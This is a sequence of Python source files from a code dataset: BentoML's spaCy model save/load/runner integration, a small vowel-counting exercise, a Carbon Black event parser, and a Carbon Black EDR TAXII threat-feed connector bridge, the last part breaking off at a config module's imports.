logger.warning(
f"{required} cannot be downloaded as pip package. If this"
" is a custom pipeline there is nothing to worry about."
" If this is a pretrained model provided by Explosion make"
" sure that you save the correct package and model to BentoML"
" via `bentoml.spacy.save()`"
)
try:
# check if pipeline has additional requirements then all related
# pip package has been installed correctly.
additional = model.info.options["additional_requirements"]
not_existed = list() # type: t.List[str]
dists = packages_distributions()
for module_name in additional:
mod, _ = split_requirement(module_name)
if mod not in dists:
not_existed.append(module_name)
if len(not_existed) > 0:
raise MissingDependencyException(
f"`{','.join(not_existed)}` is required by `{tag}`."
)
except KeyError:
pass
return util.load_model(
model.path, vocab=vocab, disable=disable, exclude=exclude, config=config
)
@inject
def save(
name: str,
model: "spacy.language.Language",
*,
metadata: t.Union[None, t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Save a model instance to BentoML modelstore.
Args:
name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
model (`spacy.language.Language`):
Instance of model to be saved
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.types.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
Examples:
.. code-block:: python
import spacy
import bentoml.spacy
nlp = spacy.load("en_core_web_trf")
# custom training or layers here
bentoml.spacy.save("spacy_roberta", nlp)
""" # noqa
context: t.Dict[str, t.Any] = {
"framework_name": "spacy",
"pip_dependencies": [f"spacy=={get_pkg_version('spacy')}"],
}
_model = Model.create(
name,
module=MODULE_NAME,
options=None,
context=context,
metadata=metadata,
)
meta = model.meta
pip_package = f"{meta['lang']}_{meta['name']}"
_model.info.options = {"pip_package": pip_package}
if "requirements" in meta:
_model.info.options["additional_requirements"] = meta["requirements"]
model.to_disk(_model.path)
_model.save(model_store)
return _model.tag
@inject
def projects(
save_name: str,
tasks: str,
name: t.Optional[str] = None,
repo_or_store: t.Optional[str] = None,
remotes_config: t.Optional[t.Dict[str, t.Dict[str, str]]] = None,
*,
branch: t.Optional[str] = None,
sparse_checkout: bool = False,
verbose: bool = True,
metadata: t.Optional[t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Enables users to use :code:`spacy cli` and integrate SpaCy `Projects <https://spacy.io/usage/projects>`_ to BentoML.
Args:
save_name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
tasks (:code:`str`):
Given SpaCy CLI tasks. Currently only support :code:`pull` and :code:`clone`
repo_or_store(:code:`str`, `optional`, defaults to `None`):
URL of Git repo or given S3 store containing project templates.
model (`spacy.language.Language`):
Instance of model to be saved
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
branch (:code:`str`, `optional`, defaults to `None`):
The branch to clone from. If not specified, defaults to :code:`main` branch
verbose (`bool`, `optional`, default to :code:`True`):
Verbosely post all logs.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.types.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
.. warning::
This is an **EXPERIMENTAL** API as it is subjected to change. We are also looking for feedback.
Examples:
.. code-block:: python
import bentoml
clone_tag = bentoml.spacy.projects(
"test_spacy_project",
"clone",
name="integrations/huggingface_hub",
repo_or_store="https://github.com/aarnphm/bentoml-spacy-projects-integration-tests",
)
project_path = bentoml.spacy.load_project(clone_tag)
project_yml = {
"remotes": {
"default": "https://github.com/aarnphm/bentoml-spacy-projects-integration-tests/tree/v3/pipelines/tagger_parser_ud",
}
}
pull_tag = bentoml.spacy.projects("test_pull", "pull", remotes_config=project_yml)
project_path = bentoml.spacy.load_project(pull_tag)
""" # noqa
# EXPERIMENTAL: note that these functions are direct modified implementation
# from spacy internal API. Subject to change, use with care!
from spacy.cli.project.pull import project_pull
from spacy.cli.project.clone import project_clone
if repo_or_store is None:
repo_or_store = getattr(spacy.about, "__projects__")
if branch is None:
branch = getattr(spacy.about, "__projects_branch__")
if tasks in PROJECTS_CMD_NOT_SUPPORTED:
raise BentoMLException(
"""\
BentoML only supports `clone` and `pull` for
git and remote storage from SpaCy CLI to
save into modelstore. Refers to
https://spacy.io/api/cli#project for more
information on SpaCy Projects.
"""
)
context: t.Dict[str, t.Any] = {
"framework_name": "spacy",
"pip_dependencies": [f"spacy=={get_pkg_version('spacy')}"],
"tasks": tasks,
}
_model = Model.create(
save_name,
module=MODULE_NAME,
options=None,
context=context,
metadata=metadata,
)
output_path = _model.path_of(SAVE_NAMESPACE)
_model.info.options = {"projects_uri": repo_or_store, "target_path": SAVE_NAMESPACE}
if tasks == "clone":
# TODO: update check for master or main branch
assert (
name is not None
), "`name` of the template is required to clone a project."
_model.info.options["name"] = name
assert isinstance(repo_or_store, str) and isinstance(branch, str)
project_clone(
name,
Path(output_path),
repo=repo_or_store,
branch=branch,
sparse_checkout=sparse_checkout,
)
copy_tree(_model.path, output_path)
else:
# works with S3 bucket, haven't failed yet
assert (
remotes_config is not None
), """\
`remotes_config` is required in order to pull projects into
BentoML modelstore. Refers to
https://spacy.io/usage/projects#remote
for more information. We will accept remotes
as shown:
{
'remotes':
{
'default':'s3://spacy-bucket',
}
}
"""
os.makedirs(output_path, exist_ok=True)
with Path(output_path, "project.yml").open("w") as inf:
yaml.dump(remotes_config, inf)
for remote in remotes_config.get("remotes", {}):
pull: "partial[t.Generator[t.Tuple[str, str], None, None]]" = partial(
project_pull, remote=remote, verbose=verbose
)
for url, res_path in pull(Path(output_path)):
if url is not None: # pragma: no cover
logger.info(f"Pulled {res_path} from {repo_or_store}")
_model.save(model_store)
return _model.tag
class _SpacyRunner(Runner):
@inject
def __init__(
self,
tag: Tag,
gpu_device_id: t.Optional[int],
name: str,
resource_quota: t.Optional[t.Dict[str, t.Any]],
batch_options: t.Optional[t.Dict[str, t.Any]],
vocab: t.Union["Vocab", bool], # type: ignore[reportUnknownParameterType]
disable: t.Iterable[str],
exclude: t.Iterable[str],
config: t.Union[t.Dict[str, t.Any], "Config"],
as_tuples: t.Union[Literal[True], Literal[False]],
batch_size: t.Optional[int],
component_cfg: t.Optional[t.Dict[str, t.Dict[str, t.Any]]],
backend_options: t.Optional[Literal["pytorch", "tensorflow"]] = "pytorch",
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
):
in_store_tag = model_store.get(tag).tag
super().__init__(name, resource_quota, batch_options)
self._tag = in_store_tag
self._vocab: t.Union["Vocab", bool] = vocab
self._disable = disable
self._exclude = exclude
self._config = config
self._model_store = model_store
self._backend_options = backend_options
self._gpu_device_id = gpu_device_id
if self._gpu_device_id is not None:
if resource_quota is None:
resource_quota = dict(gpus=self._gpu_device_id)
else:
resource_quota["gpus"] = self._gpu_device_id
self._configure(backend_options)
self._as_tuples = as_tuples
self._batch_size = batch_size
self._component_cfg = component_cfg
super().__init__(str(tag), resource_quota, batch_options)
def _configure(self, backend_options: t.Optional[str]) -> None:
if self._gpu_device_id is not None and thinc_util.prefer_gpu(
self._gpu_device_id
): # pragma: no cover
assert backend_options is not None
if backend_options == "pytorch":
thinc_backends.use_pytorch_for_gpu_memory()
else:
thinc_backends.use_tensorflow_for_gpu_memory()
thinc_util.require_gpu(self._gpu_device_id)
thinc_backends.set_gpu_allocator(backend_options)
thinc_util.set_active_gpu(self._gpu_device_id)
else:
thinc_util.require_cpu()
@property
def required_models(self) -> t.List[Tag]:
return [self._tag]
@property
def num_concurrency_per_replica(self) -> int:
if self.resource_quota.on_gpu:
return 1
return int(round(self.resource_quota.cpu))
def _get_pytorch_gpu_count(self) -> t.Optional[int]:
assert self._backend_options == "pytorch"
devs = getattr(torch, "cuda").device_count()
if devs == 0:
logger.warning("Installation of Torch is not CUDA-enabled.")
logger.warning(
_TORCH_TF_WARNING.format(
framework="PyTorch",
package="torch",
link="https://pytorch.org/get-started/locally/",
)
)
return None
return devs
def _get_tensorflow_gpu_count(self) -> t.Optional[int]:
assert self._backend_options == "tensorflow"
from tensorflow.python.client import (
device_lib, # type: ignore; pylint: disable=E0611
)
try:
return len(
[
x
for x in getattr(device_lib, "list_local_devices")()
if getattr(x, "device_type") == "GPU"
]
)
except (AttributeError, Exception): # pylint: disable=broad-except
logger.warning(
_TORCH_TF_WARNING.format(
framework="Tensorflow 2.x",
package="tensorflow",
link="https://www.tensorflow.org/install/gpu",
)
)
return None
@property
def num_replica(self) -> int:
if self.resource_quota.on_gpu:
if self._backend_options == "pytorch":
num_devices = self._get_pytorch_gpu_count()
else:
num_devices = self._get_tensorflow_gpu_count()
return num_devices if num_devices is not None else 1
return 1
# pylint: disable=arguments-differ,attribute-defined-outside-init
def _setup(self) -> None:
self._model = load(
self._tag,
model_store=self._model_store,
vocab=self._vocab,
exclude=self._exclude,
disable=self._disable,
config=self._config,
)
# pylint: disable=arguments-differ
def _run_batch( # type: ignore[reportIncompatibleMethodOverride]
self,
input_data: t.Union[t.Iterable[t.Tuple[t.Union[str, "Doc"], t.Any]], t.Union[str, "Doc"]], # type: ignore[reportUnknownParameterType] # noqa: LN001
) -> t.Union[t.Iterator["Doc"], t.Iterator[t.Tuple["Doc", t.Any]]]: # type: ignore[reportUnknownParameterType] # noqa: LN001
return self._model.pipe( # type: ignore[reportGeneralTypeIssues]
input_data, # type: ignore[reportGeneralTypeIssues]
as_tuples=self._as_tuples,
batch_size=self._batch_size,
disable=self._disable,
component_cfg=self._component_cfg,
n_process=self.num_replica,
)
@inject
def load_runner(
tag: t.Union[str, Tag],
*,
gpu_device_id: t.Optional[int] = None,
backend_options: t.Optional[Literal["pytorch", "tensorflow"]] = None,
name: t.Optional[str] = None,
resource_quota: t.Optional[t.Dict[str, t.Any]] = None,
batch_options: t.Optional[t.Dict[str, t.Any]] = None,
vocab: t.Union["Vocab", bool] = True, # type: ignore[reportUnknownParameterType]
disable: t.Iterable[str] = util.SimpleFrozenList(), # noqa
exclude: t.Iterable[str] = util.SimpleFrozenList(), # noqa
config: t.Union[t.Dict[str, t.Any], "Config"] = util.SimpleFrozenDict(), # noqa
as_tuples: t.Union[Literal[True], Literal[False]] = False,
batch_size: t.Optional[int] = None,
component_cfg: t.Optional[t.Dict[str, t.Dict[str, t.Any]]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "_SpacyRunner":
"""
Runner represents a unit of serving logic that can be scaled horizontally to
maximize throughput. :func:`bentoml.spacy.load_runner` implements a Runner class that
wrap around :obj:`spacy.language.Language` model, which optimize it for the BentoML runtime.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore..
gpu_device_id (`int`, `optional`, defaults to `None`):
GPU device ID.
backend_options (`Literal['pytorch', 'tensorflow'], `optional`, defaults to `None`):
Backend options for Thinc. Either PyTorch or Tensorflow.
resource_quota (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure resources allocation for runner.
batch_options (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure batch options for runner in a service context.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
vocab (:code:`Union[spacy.vocab.Vocab, bool]`, `optional`, defaults to `True`):
Optional vocab to pass in on initialization. If True, a new Vocab object will be created.
disable (`Iterable[str]`, `optional`):
Names of pipeline components to disable.
exclude (`Iterable[str]`, `optional`):
Names of pipeline components to exclude. Excluded
components won't be loaded.
config (:code:`Union[Dict[str, Any], spacy.Config]`, `optional`):
Config overrides as nested dict or dict
keyed by section values in dot notation.
as_tuples (`Literal[False, True]`, `optional`, defaults to `False`):
If set to True, inputs should be a sequence of
(text, context) tuples. Output will then be a sequence of
(doc, context) tuples.
batch_size (`int`, `optional`, defaults to `None`):
The number of texts to buffer.
component_cfg (:code:`Dict[str, :code:`Dict[str, Any]]`, `optional`, defaults to `None`):
An optional dictionary with extra keyword
arguments for specific components.
Returns:
:obj:`~bentoml._internal.runner.Runner`: Runner instances for the target :mod:`bentoml.sklearn` model
Examples:
.. code-block:: python
import bentoml
runner = bentoml.sklearn.load_runner("my_model:latest")
runner.run([[1,2,3,4]])
"""
tag = Tag.from_taglike(tag)
if name is None:
name = tag.name
return _SpacyRunner(
tag=tag,
gpu_device_id=gpu_device_id,
backend_options=backend_options,
name=name,
resource_quota=resource_quota,
batch_options=batch_options,
vocab=vocab,
disable=disable,
exclude=exclude,
config=config,
as_tuples=as_tuples,
batch_size=batch_size,
component_cfg=component_cfg,
model_store=model_store,
)
``` |
{
"source": "JJessee1371/codewars---python",
"score": 4
} |
#### File: Algorithms/VowelCount/vowelCount.py
```python
def vowelCount(str):
count = 0
for i in str:
if i == "a" or i == "e" or i == "u" or i == "i" or i == "o":
count += 1
print(count)
exString = "Count the vowels in me!"
vowelCount(exString)
``` |
{
"source": "jjfallete/cb-event-forwarder",
"score": 3
} |
#### File: cbeventforwarder/lib/event_parser.py
```python
import json
import logging
import event_helpers
LOGGER = logging.getLogger(__name__)
class EventParser(object):
def __init__(self, options):
self.sensor_id_to_details_map = {}
self.cb_server = options.get("server_name", None)
def parse_event_pb(self, protobuf_bytes, routing_key):
"""
Parse an EDR event bus message that is in a protobuf format
"""
(sensor_id, event_obj) = event_helpers.protobuf_to_obj_and_host(protobuf_bytes)
# since we have multiple object types
# we overwrite some fields in the protobuf based
# event object
event_obj["event_type"] = event_obj["type"]
event_obj["type"] = routing_key
# and the server identifier
if self.cb_server is not None:
event_obj["cb_server"] = self.cb_server
return [event_obj]
@staticmethod
def get_process_guid_from_id(unique_id):
"""
Extract the process ID from a process' unique ID.
A process' unique ID may contain a segment ID, which need to be stripped out (e.g. "<process_id>-<segment_id>")
"""
parts = unique_id.split("-")
if len(parts) == 6:
parts = parts[0:5]
return "-".join(parts)
else:
return unique_id
def fix_process_guids(self, event):
"""
Extract and map process GUIDs based on their unique IDs
"""
if "docs" in event:
for d in event["docs"]:
if "unique_id" in d:
d["process_guid"] = self.get_process_guid_from_id(d["unique_id"])
if "parent_unique_id" in d:
d["parent_guid"] = self.get_process_guid_from_id(d["parent_unique_id"])
if "process_id" in event:
pid = event["process_id"]
event["process_guid"] = pid
del event["process_id"]
return event
def parse_event_json(self, msg_body, routing_key):
"""
Parse an EDR event bus message that is in a JSON format
"""
json_obj = json.loads(msg_body)
json_obj["type"] = routing_key
ret_events = []
# for two types of alerts - the matches
# are coalesed into a single alert
# for our cases where we split them apart
if routing_key.startswith("watchlist.hit."):
for d in json_obj["docs"]:
c = json_obj.copy()
c["docs"] = [d]
ret_events.append(c)
else:
ret_events.append(json_obj)
for event_obj in ret_events:
if "highlights" in event_obj:
del event_obj["highlights"]
# keep the timestamp field name consistently
if "event_timestamp" in event_obj:
event_obj["timestamp"] = event_obj["event_timestamp"]
del event_obj["event_timestamp"]
#
# when it makes sense add sensor
# information to the object. This is dependent
# on the object type
#
if routing_key == "watchlist.storage.hit.process" or routing_key == "watchlist.hit.process":
d = event_obj["docs"]
if "hostname" in d:
d["computer_name"] = d["hostname"]
else:
# rather than track the correct objects - just look
# for a sensor id
if "hostname" in event_obj:
event_obj["computer_name"] = event_obj["hostname"]
# fix up terminology on process id/guid so that "process_guid" always
# refers to the process guid (minus segment)
event_obj = self.fix_process_guids(event_obj)
# add the "cb_server" field to the json. This is used
# to tie the event to a specific cluster/server in environments
# where multiple servers are deployed
# some of the watchlist events have a server_name field but that
# might reference a minion within a cluster or can sometimes be blank
if self.cb_server is not None:
event_obj["cb_server"] = self.cb_server
return ret_events
def parse_events(self, content_type, routing_key, body):
"""
Parse a Rabbit MQ event based on it's contest type and routing key
Note: Result is an array of events as one message bus event may yield multiple events
"""
try:
if "application/protobuf" == content_type:
# if the type is protobuf - we handle it here
# this means it is a raw sensor event
return self.parse_event_pb(body, routing_key)
elif "application/json" == content_type:
# handle things already in JSON
return self.parse_event_json(body, routing_key)
else:
raise ValueError("Unexpected content_type: %s" % content_type)
except Exception as e:
LOGGER.exception("%s" % e)
return []
``` |
{
"source": "jjfallete/cb-taxii-connector",
"score": 2
} |
#### File: connectors/taxii/bridge.py
```python
import gc
import logging
import os
import signal
import sys
import threading
import time
import traceback
from logging.handlers import RotatingFileHandler
from multiprocessing import Process, Value
from time import gmtime, strftime
# noinspection PyProtectedMember
from timeit import default_timer as timer
from typing import Any, Dict, List, Optional, Union
import cbint
import flask
import simplejson
from cbapi.errors import ServerError
from cbapi.example_helpers import get_object_by_name_or_id
from cbapi.response import CbResponseAPI, Feed
from cbint.utils import cbserver, flaskfeed
from cbint.utils.daemon import CbIntegrationDaemon
from cbopensource.constant import MiB
from cbopensource.driver.taxii import TaxiiDriver
# override JSON used
from cbopensource.driver.taxii_server_config import TaxiiServerConfiguration
from . import version
from .feed_cache import FeedCache
from .taxii_connector_config import TaxiiConnectorConfiguration, TaxiiConnectorConfigurationException
sys.modules['json'] = simplejson
_logger = logging.getLogger(__name__)
__all__ = ['log_option_value', 'TimeStamp', 'CarbonBlackTaxiiBridge']
# noinspection PySameParameterValue
def log_option_value(label: str, value: Union[str, int], padding: int = 27) -> None:
"""
Info log display of a given option.
:param label: Option label
:param value: option value
:param padding: padding
"""
_logger.info(f"{label:{padding}}: {value}")
class TimeStamp(object):
"""
Class to store and work with timestamps.
"""
def __init__(self, stamp: bool = False):
"""
Initialize the class.
:param stamp: If True, initialize with the current GMT time
"""
self._value = None
if stamp:
self.stamp()
def __str__(self):
if not self._value:
return "Never"
return strftime("%a, %d %b %Y %H:%M:%S +0000", self._value)
def __repr__(self):
return "TimeStamp({0})".format(self.__str__())
# --------------------------------------------------------------------------------
def stamp(self) -> None:
"""
Stamps the value of this TimeStamp with the current GMT time.
"""
self._value = gmtime()
# noinspection PyUnusedFunction
def clone(self) -> 'TimeStamp':
"""
Create a cloned object.
:return: New object with the same timestamp.
"""
ts = TimeStamp()
ts._value = self._value
return ts
class CarbonBlackTaxiiBridge(CbIntegrationDaemon):
"""
Class to manage the bridge bewteen EDR and the Taxii services.
"""
def __init__(self, name: str, configfile: str, logfile: str = None, pidfile: str = None, debug: bool = False):
"""
Initialize the class.
:param name: name of the connector
:param configfile: path to the config file
:param logfile: path to the log file
:param pidfile: path to the PID file
:param debug: If True, execute in DEBUG mode
"""
CbIntegrationDaemon.__init__(self, name, configfile=configfile, logfile=logfile, pidfile=pidfile, debug=debug)
# NOTE: at this point, 'self.cfg' contains the RawConfigParser() object based on the supplied config.ini
# 'self.options' contains a Dict parsed from the 'self.cfg' with a key for each stanza
self.flask_feed = flaskfeed.FlaskFeed(__name__, False, TaxiiConnectorConfiguration.DIRECTORY)
self._config: Optional[TaxiiConnectorConfiguration] = None
self.taxii_servers: List[Dict] = []
self.api_urns = {}
self.validated_config = False
self.cb: Optional[CbResponseAPI] = None
self.sync_needed = False
self.feed_lock = threading.RLock()
self.logfile = logfile
self.debug = debug
self._log_handler = None
self.logger = _logger
self.process = None
self.feed_cache = None
self.flask_feed.app.add_url_rule(TaxiiConnectorConfiguration.CB_IMAGE_PATH,
view_func=self.handle_cb_image_request)
self.flask_feed.app.add_url_rule(TaxiiConnectorConfiguration.INTEGRATION_IMAGE_PATH,
view_func=self.handle_integration_image_request)
self.flask_feed.app.add_url_rule(TaxiiConnectorConfiguration.JSON_FEED_PATH,
view_func=self.handle_json_feed_request,
methods=['GET'])
self.flask_feed.app.add_url_rule("/", view_func=self.handle_index_request, methods=['GET'])
self.flask_feed.app.add_url_rule("/feed.html", view_func=self.handle_html_feed_request, methods=['GET'])
self.initialize_logging()
_logger.debug("generating feed metadata")
with self.feed_lock:
self.last_sync = TimeStamp()
self.last_successful_sync = TimeStamp()
self.feed_ready = False
signal.signal(signal.SIGTERM, self._sigterm_handler)
def initialize_logging(self) -> None:
"""
Initialize the bridge logging.
"""
if not self.logfile:
log_path = f"/var/log/cb/integrations/{self.name}/"
# noinspection PyUnresolvedReferences
cbint.utils.filesystem.ensure_directory_exists(log_path)
self.logfile = f"{log_path}{self.name}.log"
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG if self.debug else logging.INFO)
root_logger.handlers = []
rlh = RotatingFileHandler(self.logfile, maxBytes=10 * MiB, backupCount=10)
rlh.setFormatter(logging.Formatter(fmt="%(asctime)s - %(levelname)-7s - %(module)s - %(message)s"))
self._log_handler = rlh
root_logger.addHandler(rlh)
self.logger = root_logger
@property
def integration_name(self) -> str:
"""
:return: The integration name and version
"""
return f'Cb Taxii Connector {version.__version__}'
def serve(self) -> None:
"""
Start the server.
"""
if self._config.https_proxy:
os.environ['HTTPS_PROXY'] = self._config.https_proxy
os.environ['no_proxy'] = '127.0.0.1,localhost'
address = self._config.listener_address
port = self._config.listener_port
_logger.info(f"starting flask server: {address}:{port}")
self.flask_feed.app.run(port=port, debug=self.debug, host=address, use_reloader=False)
def handle_json_feed_request(self):
"""
Handle a JSON feed request.
TODO: properly type return!
:return:
"""
self._report_memory_usage("hosting")
return flask.send_from_directory(self.feed_cache.location, self.feed_cache.file_name,
mimetype='application/json')
def handle_html_feed_request(self):
"""
Handle an HTML feed request.
TODO: properly type return!
:return:
"""
the_feed = self.feed_cache.read()
if not the_feed:
return flask.Response(status=404)
html = self.flask_feed.generate_html_feed(the_feed, self._config.DISPLAY_NAME)
del the_feed
gc.collect()
return html
def handle_index_request(self):
"""
Handle an index request.
TODO: properly type return!
:return:
"""
with self.feed_lock:
index = self.flask_feed.generate_html_index(self.feed_cache.generate_feed(), self._config.options,
self._config.DISPLAY_NAME, self._config.CB_IMAGE_PATH,
self._config.INTEGRATION_IMAGE_PATH,
self._config.JSON_FEED_PATH, str(self.last_sync))
return index
def handle_cb_image_request(self):
"""
Handle a CB image request.
TODO: properly type return!
:return:
"""
return self.flask_feed.generate_image_response(
image_path=f"{self._config.DIRECTORY}{self._config.CB_IMAGE_PATH}")
def handle_integration_image_request(self):
"""
Handle an integration image request.
TODO: properly type return!
:return:
"""
return self.flask_feed.generate_image_response(image_path=(f"{self._config.DIRECTORY}"
f"{self._config.INTEGRATION_IMAGE_PATH}"))
def on_starting(self) -> None:
"""
On startup, check the feed cache.
"""
self.feed_cache.verify()
def run(self) -> None:
"""
Begin execution of the service.
"""
_logger.info(f"starting VMware Carbon Black EDR <-> taxii Connector | version {version.__version__}")
_logger.debug("starting continuous feed retrieval thread")
work_thread = threading.Thread(target=self.perform_continuous_feed_retrieval)
work_thread.setDaemon(True)
work_thread.start()
_logger.debug("starting flask")
self.serve()
def validate_config(self) -> bool:
"""
Validate internal configuration. If already validated, we simply return.
:return: True if valid, False otherwise
:raises: ValueError if there are configuration problems
"""
if self.validated_config:
return True
self.validated_config = True
_logger.debug("Loading configuration options...")
try:
if 'bridge' not in self.options:
raise ValueError("Configuration does not contain a [bridge] section")
# NOTE: 'bridge' contains the connector settings
try:
self._config = TaxiiConnectorConfiguration.parse(self.options['bridge'])
except TaxiiConnectorConfigurationException:
return False
self.debug = self._config['debug']
self.logger.setLevel(logging.DEBUG if self.debug else logging.getLevelName(self._config['log_level']))
self._log_handler.maxBytes = self._config['log_file_size']
# NOTE: All other option keys besides 'bridge' contain settings for each taxii server
taxii_server_sections = list(filter(lambda section: section != 'bridge', self.cfg.sections()))
if not taxii_server_sections:
raise ValueError("Configuration does not contain section(s) defining a taxii server")
self.taxii_servers = [TaxiiServerConfiguration.parse(self.cfg[server_section]).dict for server_section
in taxii_server_sections]
ca_file = os.environ.get("REQUESTS_CA_BUNDLE", None)
log_option_value("CA Cert File", ca_file if ca_file else "No CA Cert file found.")
self.feed_cache = FeedCache(self._config, self._config['cache_folder'], self.feed_lock)
if not self._config['skip_cb_sync']:
try:
self.cb = CbResponseAPI(url=self._config['carbonblack_server_url'],
token=self._config['carbonblack_server_token'],
ssl_verify=False,
integration_name=self.integration_name)
self.cb.info()
except Exception as e:
raise ValueError(f"Could not connect to Cb Response server: {e}")
except ValueError as e:
sys.stderr.write(f"Configuration Error: {e}\n")
_logger.error(e)
return False
return True
# noinspection PyUnusedLocal
@staticmethod
def _report_memory_usage(title: str) -> None:
"""
Private method to report current memory usage.
NOTE: currently stubbed to only perform garbage collection.
:param title: title of the report
"""
gc.collect()
@staticmethod
def handle_shared_return(shared_return, value: Any) -> Any:
"""
Set a value parameter on a shared return object (if provided), or juet return it.
:param shared_return:
:param value:
:return:
"""
if shared_return is not None:
shared_return.value = value
return value
def _do_write_reports(self, shared_return=None) -> bool:
"""
Private method to write TAXII reports.
:return: True if successful
"""
start = timer()
self._report_memory_usage("writing")
with self.feed_cache.create_stream() as feed_stream:
tc = TaxiiDriver(self.taxii_servers)
if tc.write_reports(feed_stream):
self.last_successful_sync.stamp()
_logger.info("Successfully retrieved data at {0} ({1:.3f} seconds total)".format(
self.last_successful_sync, timer() - start))
self._report_memory_usage("saved")
return self.handle_shared_return(shared_return, True)
else:
_logger.warning("Failed to retrieve data at {0} ({1:.3f} seconds total)".format(
TimeStamp(True), timer() - start))
return self.handle_shared_return(shared_return, False)
def _do_retrieve_reports(self, shared_return=None) -> bool:
"""
Private method to retrieve TAXII reports.
:return: True if successful
"""
start = timer()
self._report_memory_usage("reading")
tc = TaxiiDriver(self.taxii_servers)
reports = tc.generate_reports()
self._report_memory_usage("generated")
_logger.debug("Retrieved reports ({0:.3f} seconds).".format(timer() - start))
if reports:
# Instead of rewriting the cache file directly, we're writing to a temporary file
# and then moving it onto the cache file so that we don't have a situation where
# the cache file is only partially written and corrupt or empty.
if self.feed_cache.write_reports(reports):
self.last_successful_sync.stamp()
del reports
_logger.info("Successfully retrieved data at {0} ({1:.3f} seconds total)".format(
self.last_successful_sync, timer() - start))
self._report_memory_usage("saved")
self.handle_shared_return(shared_return, True)
else:
_logger.warning("Failed to retrieve data at {0} ({1:.3f} seconds total)".format(
TimeStamp(True), timer() - start))
return self.handle_shared_return(shared_return, False)
# noinspection PyUnusedLocal
def _sigterm_handler(self, the_signal, frame) -> None:
"""
Private method to handle termination signals.
:param the_signal: the signal received
:param frame: the current stack frame
"""
_logger.info("Process shutting down...")
if self.process:
_logger.info("Sub-process found. Terminating...")
self.process.terminate()
_logger.info("Sub-process terminated.")
sys.exit()
def _retrieve_reports(self) -> bool:
"""
Private metheod to write or retrieve reports, depending on multi-core status and/or use of a feed stream.
:return: True if successful
"""
if self._config['multi_core']:
success = Value('B', False)
self._report_memory_usage("before")
process = Process(
target=self._do_write_reports if self._config['use_feed_stream'] else self._do_retrieve_reports,
kwargs={'shared_return': success})
process.start()
self.process = process
while process.is_alive():
process.join(timeout=1)
self.process = None
self._report_memory_usage("after")
return success.value
return self._do_retrieve_reports()
def perform_continuous_feed_retrieval(self, loop_forever=True) -> str:
"""
Method to poll the feeds one time or continuously (until terminated).
:param loop_forever: If True, loop until terminated
:return: feed cache, if not looping
"""
try:
self.validate_config()
# noinspection PyUnresolvedReferences
cbint.utils.filesystem.ensure_directory_exists(self._config['cache_folder'])
while True:
_logger.info("Starting feed retrieval.")
errored = True
try:
success = self._retrieve_reports()
if success:
self._sync_cb_feed()
errored = False
except Exception as e:
_logger.exception("Error occurred while attempting to retrieve feed: {0}".format(e))
gc.collect()
self.last_sync.stamp()
_logger.debug("Feed report retrieval completed{0}.".format(" (Errored)" if errored else ""))
if not loop_forever:
return self.feed_cache.read(as_text=True)
# Full sleep interval is taken between feed retrieval work.
time.sleep(self._config['feed_retrieval_minutes'] * 60)
except Exception as err:
# If an exception makes us exit then log what we can for our own sake
_logger.fatal("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!")
_logger.fatal(f"Fatal Error Encountered:\n{err}\n{traceback.format_exc()}")
sys.stderr.write("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!\n")
sys.stderr.write(f"Fatal Error Encountered:\n{err}\n{traceback.format_exc()}")
sys.exit(3)
def _sync_cb_feed(self) -> None:
"""
Private method to sync EDR feeds.
"""
if self._config['skip_cb_sync']:
return
try:
feeds = get_object_by_name_or_id(self.cb, Feed, name=self._config.FEED_NAME)
except Exception as e:
_logger.error(e)
feeds = None
if not feeds:
_logger.info(f"Feed {self._config.FEED_NAME} was not found, so we are going to create it")
f = self.cb.create(Feed)
# noinspection HttpUrlsUsage
f.feed_url = f"http://{self._config['host_address']}:{self._config['listener_port']}/taxii/json"
f.enabled = True
f.use_proxy = False
f.validate_server_cert = False
try:
f.save()
except ServerError as se:
if se.error_code == 500:
_logger.info("Could not add feed:")
_logger.info(
" Received error code 500 from server. "
"This is usually because the server cannot retrieve the feed.")
_logger.info(
" Check to ensure the Cb server has network connectivity and the credentials are correct.")
else:
_logger.info(f"Could not add feed: {str(se)}")
except Exception as e:
_logger.info(f"Could not add feed: {str(e)}")
else:
_logger.info(f"Feed data: {str(f)}")
_logger.info(f"Added feed. New feed ID is {f.id}")
f.synchronize(False)
elif len(feeds) > 1:
_logger.warning(f"Multiple feeds found, selecting first one (Feed id {feeds[0].id})")
elif feeds:
feed_id = feeds[0].id
_logger.info(f"Feed {self._config.FEED_NAME} was found as Feed ID {feed_id}")
feeds[0].synchronize(False)
```
#### File: cbopensource/driver/taxii_server_config.py
```python
import os
import re
from enum import Enum
from taxii2client.common import TokenAuth
from taxii2client.v20 import Server as ServerV20
from taxii2client.v21 import Server as ServerV21
from cbopensource.utilities.common_config import BoolConfigOption, CertConfigOption, CommaDelimitedListConfigOption, \
CommonConfigBase, CommonConfigException, CommonConfigOptionBase, IntConfigOption, PairedConfigOption, \
StringConfigOption
